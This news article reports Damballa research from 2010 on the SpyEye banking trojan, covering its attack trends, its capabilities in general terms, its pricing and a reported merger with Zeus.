SpyEye trojan attacks surged in July, August, and September, reaching between 35 and 45 attacks each month. Over the entire period measured by Damballa, from January to October 2010, there were 190 known attacks.
Almost 30% of the trojan's attacks came from Ukraine, with the Czech Republic ranking second with 12% and the US third with 8%.
In just one case, 28 590 computers were infected over a 25-day period with the SpyEye trojan. “SpyEye is an up-and-coming piece of malware over the past year, heavily competing with Zeus. It is quite effective and cheaper,” said James in an interview with Infosecurity. In fact, SpyEye only costs $500, a bargain for penny-pinching criminals.
SpyEye has similar capabilities to the Zeus trojan. Once the SpyEye trojan gains access to a computer, it can download files, modify system processes, log user keystrokes, and build a botnet. It even claims to have the capability to “kill Zeus”. If the Zeus trojan is already running on the system, SpyEye takes over the process and steals the traffic that Zeus would have stolen, James explained.
SpyEye has a web injection capability so that if a user goes to his or her bank, the hackers can obtain ATM and credit card numbers using the capability. Hackers can do “local phishing on the fly by adding in entries that they might want to obtain”, James said. SpyEye also allows the hacker to modify money transfer information of the victim so that the money transfer goes to the hacker’s bank account rather than the intended recipient.
The trojan permutates so it can avoid anti-virus software updates, he said. SpyEye users are in a race with anti-virus software companies.
James said that SpyEye has a plug-in specifically for Bank of America so that it can defeat the site password and site key features. “When you go to a Bank of America account, it will have a login and a site key image….[SpyEye] has the ability to steal the user name, password, and site key information. Once users go in, if they are doing any kind of money transfers, there is a feature called site pass, which is a two-factor authentication system. SpyEye can report that in real-time to the operators so that if they want to log into the Bank of America account while money is being transferred, they can do that.”
In an Aug. 25 blog post, James wrote about some of the characteristics of the SpyEye trojan. In a follow-up article, made available to Infosecurity but not yet posted on the Damballa blog, James detailed the traffic characteristics of SpyEye.
“Traffic analysis for SpyEye reveals particular information about the specific exploits incurred by the botnet operators as well as their specific motives. Acquiring intelligence early on about an increasing threat such as SpyEye is essential in order to gain an upper hand against such malice. Performing traffic analysis is an effective method to obtain information about the intentions and actions of an enemy, in this case, an operator of SpyEye utilizing the tool to steal credentials and financial information from unsuspecting computer users,” James wrote.
Since January 2010 there have been 173 unique SpyEye domains discovered in the wild and 17 IP addresses hosted on 77 unique ISPs in 24 countries. “Many have had a decent life-cycle and have demonstrated gradual growth overtime in use,” he said.
“What is apparent is that the summer months have seen significant growth for SpyEye activity and it's predicted that the growth will maintain since it's a low-cost and effective do-it-yourself trojan kit with many features. With over 190 known unique SpyEye assaults over an eight month period, it can be suggested that this specific malicious software is growing in popularity and will likely continue to do so,” he wrote.
James cited a blog post by Brian Krebs indicating that SpyEye and Zeus were considering merging.
“Leading malware developers within the cyber crime community have conspired to terminate development of the infamous ZeuS banking trojan and to merge its code base with that of the up-and-coming SpyEye trojan, new evidence suggests. The move appears to be aimed at building a superior e-banking threat whose sale is restricted to a more exclusive and well-heeled breed of cyber crook”, Krebs wrote.
So it looks like the rules of the market economy operate in the criminal underground as well. Perhaps a catchy name for the merged trojan would be ZeusEye.